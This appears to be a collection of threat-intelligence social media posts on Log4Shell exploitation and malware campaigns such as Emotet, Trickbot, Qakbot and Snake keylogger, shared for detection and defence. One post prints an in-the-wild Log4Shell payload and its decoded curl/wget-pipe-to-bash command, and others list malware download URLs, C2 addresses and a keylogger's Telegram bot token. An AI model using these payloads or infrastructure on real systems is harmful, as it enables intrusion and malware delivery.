Iv'e created Gist with exploitation detection ideas and rules I'll update this gist frequently #log4j #log4jrce CVE-2021-44228 gist.github.com/Neo23x0/e4c8b0…

Example CVE-2021-44228 payload: ${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=} Decoded: (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash Source IP: 62.76.41.46 (🇷🇺)

Heads up: We see a lot of scanning against the #log4j vulnerability and decided to publish a blog post with some guidance: govcert.ch/blog/zero-day-… Please patch now!

#Trickbot 🤖 new Exec Flow #DFIR: Excel > CMD > mshta > PowerShell > CMD > Rundll32 > Rundll32 (unpack) > wermgr (injection) > svchost (injection) Stage 1 mshta hxxp://87.251.85[.]100/love/love7[.]html Stage2 PS hxxp://5.182.206[.]13/images/panther[.]png

Diagrams for the #Log4j #Log4Shell that can help people discuss things. Hope this helps...

This #maldoc exploits CVE-2021-40444 to inject #CobaltStrike shellcode into rundll32.exe. document.docx 79330b9f1bffdd70e33f64d9e9fbe2a8 http://188.49.118.39/word.html 5356752becd26f2c68f1802184a43582 http://188.49.118.39/word.cab 2b1a445a775ddb9419801351d5b51c9d

Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. googleprojectzero.blogspot.com/2021/12/a-deep…

ℹ️ In unrelated Log4Shell news, we saw an unusual payload being dropped by #RIGEK last week. Typically, this malvertising chain pushes #Dridex, but this time we saw a loader that fetched #Glupteba (you may recall their botnet was disrupted by Google).

🔥[Breaking blog] Ransomware Advisory:#Log4Shell Exploitation for Initial Access & Lateral Movement 1⃣Log4Shell |2⃣Discovery: Conti Becomes The First Sophisticated Crimeware Group Weaponizing Log4j2 |3⃣Early Warning: Ransomware Exploitation of Vuln advintel.io/post/ransomwar…

2022-01-04 (Tuesday) - #RemcosRAT infection from Excel file distributed through email - IOCs available at: bit.ly/3qJLhLS

Microsoft Edge traffic from South Korea 🇰🇷 redirecting to #MagnitudeEK with social engineering scheme to deliver #Magniber ransomware.

🚨#Emotet dropping #Cobaltstrike directly again. Heads up this morning for traffic to the following location. Thanks to Anonymous and Max_Malyutin for reporting! See below 👇

#Emotet - ep5 - .xls > .hta > .ps > .dll mshta hxxp://91.240.118.172/ss/hh.html hxxp://91.240.118.172/ss/ss.png hxxp://mkdevcorp.com/cgi/33HhffLF60pcv/ rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer IOC's github.com/pr0xylife/Emot…

same actor spreads #Gozi #Ursnif #malware via #malspam themed "Agenzia delle Entrate" targeting #Italy 🇮🇹 Please pay attention!⚠️ hxxps://premiumline.top/image.txt hxxps://premiumlist.top/image.txt #infosec #cybersecurity #infosecurity #cyberattacks x.com/reecdeep/statu…

🚨#Emotet Update🚨 - Looks like Ivan laid an egg for easter and has been busy. As of about 14:00UTC today 2022/04/18 - Emotet on Epoch 4 has switched over to using 64-bit loaders and stealer modules. Previously everything was 32-bit except for occasional loader shenanigans. 1/x

2022-10-12 (Wednesday) - #CobaltStrike activity caused by #IcedID (#Bokbot) infection. Cobalt Strike Stager at hxxp://mukihilama[.]com/456.dll with Cobalt Strike C2 on 23.83.133[.]97:443 using tagujog[.]com. Stager sample available at bit.ly/3MuhOA7

#Qakbot Nasty Persistence Registry Run Key 🤖 [+] Shutdown\System Suspend; install registry run key [+] Restart\System Wake-Up; delete registry run key value #DFIR Boot or Logon Autostart Exec (T1547): regsvr32.exe "C:\Users\{User}\AppData\Roaming\Microsoft\{Dir}\{Payload}.dll"

#Snake #keylogger #malware by shellcode ➡️hxxp://208.67.105.179/tonyspecialzx.exe 🔥 1⃣SMTP cp5ua[.hyperhost[.ua tonyspecial[@]steuler-kch[.]org 2⃣Telegram botid:5321688653:AAEI2yqGrOA_-sRZ3xaqutrexraSgFa0AnA chat id: 5048077662 #CyberSec #infosec #cybercrime #infosecurity

C2 Servers feeds #RecordBreaker aka #RaccoonStealerV2 👇 threatfox.abuse.ch/browse/malware…

New #ransomware called #CatB applies some anti analysis techniques and performing MSDTC service DLL hijacking to drop and execute its payload. so u can check my Yara rule here: github.com/MalGamy/YARA_R…